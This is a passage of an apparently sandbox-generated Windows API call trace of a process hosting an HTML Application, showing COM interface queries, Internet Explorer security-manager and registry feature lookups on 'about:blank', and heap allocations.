[4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x4842a4 | out: ppvObject=0x4842a4*=0x0) returned 0x80004002 [0109.613] IServiceProvider:QueryService (in: This=0x482a10, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x4842a0 | out: ppvObject=0x4842a0*=0x0) returned 0x80004002 [0109.613] IUnknown:Release (This=0x482a10) returned 0x0 [0109.613] IInternetSecurityManager:GetSecurityId (in: This=0x484280, pwszUrl="about:blank", pbSecurityId=0x22e670, pcbSecurityId=0x22e664*=0x200, dwReserved=0x0 | out: pbSecurityId=0x22e670*=0x61, pcbSecurityId=0x22e664*=0xf) returned 0x0 [0109.628] DllGetClassObject (in: rclsid=0x47f9d0*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x22dbf0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22d2a8 | out: ppv=0x22d2a8*=0x74108c70) returned 0x0 [0109.628] IUnknown:AddRef (This=0x74108c70) returned 0x1 [0109.628] IUnknown:Release (This=0x74108c70) returned 0x1 [0109.628] IUnknown:QueryInterface (in: This=0x74108c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x22de6c | out: ppvObject=0x22de6c*=0x74108c70) returned 0x0 [0109.629] IUnknown:Release (This=0x74108c70) returned 0x1 [0109.629] IUnknown:QueryInterface (in: This=0x74108c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22e02c | out: ppvObject=0x22e02c*=0x74108c7c) returned 0x0 [0109.629] IUnknown:Release (This=0x74108c70) returned 0x1 [0109.629] IInternetProtocolInfo:ParseUrl (in: This=0x74108c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4734c0, cchResult=0xc, pcchResult=0x22e074, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x22e074*=0xc) returned 0x0 [0109.629] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x481a88 [0109.629] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.629] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x481a88 | out: hHeap=0x450000) returned 1 [0109.629] IUnknown:Release (This=0x74108c7c) returned 0x1 [0109.630] DllGetClassObject (in: rclsid=0x47f9d0*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22df40 | out: ppv=0x22df40*=0x74108c70) returned 0x0 [0109.630] IUnknown:QueryInterface (in: This=0x74108c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22e02c | out: ppvObject=0x22e02c*=0x74108c7c) returned 0x0 [0109.630] IUnknown:Release (This=0x74108c70) returned 0x1 [0109.630] IInternetProtocolInfo:ParseUrl (in: This=0x74108c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4734c0, cchResult=0xc, pcchResult=0x22e084, dwReserved=0x0 | out: pwzResult="", pcchResult=0x22e084*=0x0) returned 0x800c0011 [0109.630] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.630] IUnknown:Release (This=0x74108c7c) returned 0x1 [0109.630] IUnknown:Release (This=0x47bf04) returned 0x2 [0109.630] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.630] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf) returned 0x47b748 [0109.631] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b790 [0109.631] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x22e644, dwReserved=0x0 | out: ppSM=0x22e644*=0x486280) returned 0x0 [0109.631] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf) returned 0x47b7a8 [0109.631] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x484780 [0109.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22e7f4 | out: phkResult=0x22e7f4*=0x1c0) returned 0x0 [0109.632] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22e7f8 | out: phkResult=0x22e7f8*=0x1cc) returned 0x0 [0109.632] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x22e7b4 | out: phkResult=0x22e7b4*=0x0) returned 0x2 [0109.632] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x22e7b4 | out: phkResult=0x22e7b4*=0x0) returned 0x2 [0109.632] RegCloseKey (hKey=0x0) returned 0x6 [0109.632] RegCloseKey (hKey=0x0) returned 0x6 [0109.632] RegCloseKey (hKey=0x1c0) returned 0x0 [0109.633] RegCloseKey (hKey=0x1cc) returned 0x0 [0109.633] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x128) returned 0x4847d8 [0109.633] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x484908 [0109.633] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b7d8 [0109.633] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2000) returned 0x4896a8 [0109.633] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x48b6b0 [0109.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48b6b0 | out: hHeap=0x450000) returned 1 [0109.633] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.633] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x22e638 | out: ppURI=0x22e638*=0x47bf04) returned 0x0 [0109.634] DllGetClassObject (in: rclsid=0x47f9d0*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22df10 | out: ppv=0x22df10*=0x74108c70) returned 0x0 [0109.634] IUnknown:QueryInterface (in: This=0x74108c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22dffc | out: ppvObject=0x22dffc*=0x74108c7c) returned 0x0 [0109.634] IUnknown:Release (This=0x74108c70) returned 0x1 [0109.634] IInternetProtocolInfo:ParseUrl (in: This=0x74108c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4734c0, cchResult=0xc, pcchResult=0x22e044, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x22e044*=0xc) returned 0x0 [0109.634] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x481a88 [0109.634] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.634] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x481a88 | out: hHeap=0x450000) returned 1 [0109.634] IUnknown:Release (This=0x74108c7c) returned 0x1 [0109.635] DllGetClassObject (in: rclsid=0x47f9d0*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22df10 | out: ppv=0x22df10*=0x74108c70) returned 0x0 [0109.635] IUnknown:QueryInterface (in: This=0x74108c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22dffc | out: ppvObject=0x22dffc*=0x74108c7c) returned 0x0 [0109.635] IUnknown:Release (This=0x74108c70) returned 0x1 [0109.635] IInternetProtocolInfo:ParseUrl (in: This=0x74108c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4734c0, cchResult=0xc, pcchResult=0x22e054, dwReserved=0x0 | out: pwzResult="", pcchResult=0x22e054*=0x0) returned 0x800c0011 [0109.635] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.635] IUnknown:Release (This=0x74108c7c) returned 0x1 [0109.635] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0109.635] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0109.635] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0109.638] IUnknown:Release (This=0x47bf04) returned 0x2 [0109.638] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x46d738 [0109.638] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x464808 [0109.638] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x5c) returned 0x48b6b0 [0109.638] GetDC (hWnd=0x0) returned 0x6010a73 [0109.638] GetDeviceCaps (hdc=0x6010a73, index=88) returned 96 [0109.638] ReleaseDC (hWnd=0x0, hDC=0x6010a73) returned 1 [0109.638] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0109.639] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22e890 | out: phkResult=0x22e890*=0x158) returned 0x0 [0109.639] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22e894 | out: phkResult=0x22e894*=0x1c0) returned 0x0 [0109.640] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x22e850 | out: phkResult=0x22e850*=0x0) returned 0x2 [0109.640] RegOpenKeyExW (in: hKey=0x158, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x22e850 | out: phkResult=0x22e850*=0x0) returned 0x2 [0109.640] RegCloseKey (hKey=0x0) returned 0x6 [0109.640] RegCloseKey (hKey=0x0) returned 0x6 [0109.640] RegCloseKey (hKey=0x158) returned 0x0 [0109.640] RegCloseKey (hKey=0x1c0) returned 0x0 [0109.640] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b460 [0109.640] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x469408 [0109.640] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5c) returned 0x48b718 [0109.640] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0109.641] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0109.641] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0109.641] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0109.641] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0109.641] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0109.641] RtlInitializeConditionVariable () returned 0x48b74c [0109.641] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x34) returned 0x48b780 [0109.641] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x34) returned 0x48b7c0 [0109.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4734c0 [0109.642] IUnknown:Release (This=0x74108cb0) returned 0x1 [0109.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x46d0e8 [0109.645] IUnknown_QueryService (in: punk=0x741096a4, guidService=0x73d9880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x73d9880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x482328 | out: ppvOut=0x482328*=0x0) returned 0x80004005 [0109.645] IUnknown:QueryInterface (in: This=0x741096a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x22f5e0 | out: ppvObject=0x22f5e0*=0x741096b8) returned 0x0 [0109.645] IServiceProvider:QueryService (in: This=0x741096b8, guidService=0x73d9880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x73d9880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x482328 | out: ppvObject=0x482328*=0x0) returned 0x80004005 [0109.645] IUnknown:Release (This=0x741096b8) returned 0x1 [0109.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x34) returned 0x48b800 [0109.645] IInternetSecurityManager:SetSecuritySite (This=0x484280, pSite=0x482a0c) returned 0x0 [0109.645] IUnknown:Release (This=0x482a0c) returned 0x0 [0109.645] IUnknown:AddRef (This=0x482a0c) returned 0x28 [0109.645] IUnknown:QueryInterface (in: This=0x482a0c, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x22f618 | out: ppvObject=0x22f618*=0x482a10) returned 0x0 [0109.645] IServiceProvider:QueryService (in: This=0x482a10, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x4842a8 | out: ppvObject=0x4842a8*=0x0) returned 0x80004002 [0109.645] IServiceProvider:QueryService (in: This=0x482a10, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x4842a4 | out: ppvObject=0x4842a4*=0x0) returned 0x80004002 [0109.645] IServiceProvider:QueryService (in: This=0x482a10, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x4842a0 | out: ppvObject=0x4842a0*=0x741096bc) returned 0x0 [0109.645] IUnknown:Release (This=0x482a10) returned 0x0 [0109.645] CoTaskMemAlloc (cb=0x6d) returned 0x48b840 [0109.645] CoTaskMemAlloc (cb=0x9) returned 0x48b8d0 [0109.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x48b8e8 [0109.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x48bcb8 [0109.647] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0109.647] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x44) returned 0x469458 [0109.648] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x48b900 [0109.648] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48b918 [0109.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4) returned 0x47bb70 [0109.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x481c90 [0109.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x48b930 [0109.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x94) returned 0x48bd10 [0109.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x34) returned 0x48bdb0 [0109.649] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x70) returned 0x48bdf0 [0109.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x48be68 [0109.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8b4) returned 0x48bf68 [0109.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48b948 [0109.651] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48b960 [0109.651] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x84) returned 0x48c828 [0109.652] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x48c8b8 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x48d0c0 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4c) returned 0x48d8c8 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x800) returned 0x48d920 [0109.653] IsCharSpaceW (wch=0x48) returned 0 [0109.653] IsCharAlphaNumericW (ch=0x5c) returned 0 [0109.653] IsCharSpaceW (wch=0x5c) returned 0 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4734e0 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x48e128 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x473500 [0109.653] IsCharSpaceW (wch=0x41) returned 0 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x48b978 [0109.653] IsCharAlphaNumericW (ch=0x20) returned 0 [0109.653] IsCharSpaceW (wch=0x20) returned 1 [0109.653] IsCharSpaceW (wch=0x7b) returned 0 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x481cb8 [0109.653] IsCharSpaceW (wch=0x20) returned 1 [0109.653] IsCharAlphaNumericW (ch=0x7b) returned 0 [0109.653] IsCharSpaceW (wch=0x62) returned 0 [0109.653] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48e128 | out: hHeap=0x450000) returned 1 [0109.653] IsCharAlphaNumericW (ch=0x3a) returned 0 [0109.653] IsCharSpaceW (wch=0x3a) returned 0 [0109.653] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x481ce0 [0109.657] IsCharAlphaNumericW (ch=0x3a) returned 0 [0109.657] IsCharSpaceW (wch=0x75) returned 0 [0109.657] IsCharAlphaNumericW (ch=0x28) returned 0 [0109.657] IsCharSpaceW (wch=0x28) returned 0 [0109.657] IsCharAlphaNumericW (ch=0x28) returned 0 [0109.657] IsCharSpaceW (wch=0x23) returned 0 [0109.657] IsCharSpaceW (wch=0x23) returned 0 [0109.657] IsCharSpaceW (wch=0x7d) returned 0 [0109.657] IsCharAlphaNumericW (ch=0x7d) returned 0 [0109.658] IsCharSpaceW (wch=0x29) returned 0 [0109.658] IsCharSpaceW (wch=0x75) returned 0 [0109.658] IsCharSpaceW (wch=0x75) returned 0 [0109.658] IsCharSpaceW (wch=0x29) returned 0 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x473540 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x34) returned 0x48e330 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4640f0 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48b990 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48b9a8 [0109.658] CoTaskMemFree (pv=0x48b840) [0109.658] CoTaskMemFree (pv=0x48b8d0) [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x473560 [0109.658] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0109.658] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0109.658] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x340) returned 0x48e370 [0109.658] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4a) returned 0x48b840 [0109.659] IsOS (dwOS=0x25) returned 1 [0109.659] GetSysColor (nIndex=26) returned 0xcc6600 [0109.659] IsOS (dwOS=0x25) returned 1 [0109.659] GetSysColor (nIndex=5) returned 0xffffff [0109.659] GetSysColor (nIndex=8) returned 0x0 [0109.659] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.659] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48b8d0 [0109.663] wcstol (in: _String="0,0,255", _EndPtr=0x22e274, _Radix=10 | out: _EndPtr=0x22e274*=",0,255") returned 0 [0109.663] wcstol (in: _String="0,255", _EndPtr=0x22e274, _Radix=10 | out: _EndPtr=0x22e274*=",255") returned 0 [0109.663] wcstol (in: _String="255", _EndPtr=0x22e274, _Radix=10 | out: _EndPtr=0x22e274*="") returned 255 [0109.663] wcstol (in: _String="128,0,128", _EndPtr=0x22e274, _Radix=10 | out: _EndPtr=0x22e274*=",0,128") returned 128 [0109.663] wcstol (in: _String="0,128", _EndPtr=0x22e274, _Radix=10 | out: _EndPtr=0x22e274*=",128") returned 0 [0109.663] wcstol (in: _String="128", _EndPtr=0x22e274, _Radix=10 | out: _EndPtr=0x22e274*="") returned 128 [0109.665] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0109.665] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0109.665] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f32c | out: phkResult=0x22f32c*=0xa8) returned 0x0 [0109.666] SHGetValueW (in: hkey=0xa8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x22f330, pcbData=0x22f328*=0xa | out: pdwType=0x0, pvData=0x22f330, pcbData=0x22f328*=0xa) returned 0x2 [0109.666] RegCloseKey (hKey=0xa8) returned 0x0 [0109.666] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x80) returned 0x48f6f8 [0109.666] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4647f0 [0109.666] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x3a) returned 0x464180 [0109.667] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6a) returned 0x48f780 [0109.668] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4647c0 [0109.668] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x26) returned 0x46d118 [0109.668] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6e) returned 0x48f7f8 [0109.669] GetProcessHeap () returned 0x450000 [0109.669] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48e6b8 | out: hHeap=0x450000) returned 1 [0109.669] GetProcessHeap () returned 0x450000 [0109.669] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48e710 | out: hHeap=0x450000) returned 1 [0109.669] GetProcessHeap () returned 0x450000 [0109.669] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47bb80 | out: hHeap=0x450000) returned 1 [0109.669] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x473580 [0109.669] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x464820 [0109.669] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4735a0 [0109.669] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4641c8 [0109.670] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x48f870 [0109.670] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x46d148 [0109.670] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x481d30 [0109.671] GetAcceptLanguagesW () returned 0x0 [0109.671] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b418 [0109.671] GetClassNameW (in: hWnd=0x301f0, lpClassName=0x22f5fc, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0109.671] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0109.671] GetParent (hWnd=0x301f0) returned 0x150268 [0109.671] GetClassNameW (in: hWnd=0x150268, lpClassName=0x22f5fc, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0109.671] CompareStringW (Locale=0x409, dwCmpFlags=0x0, 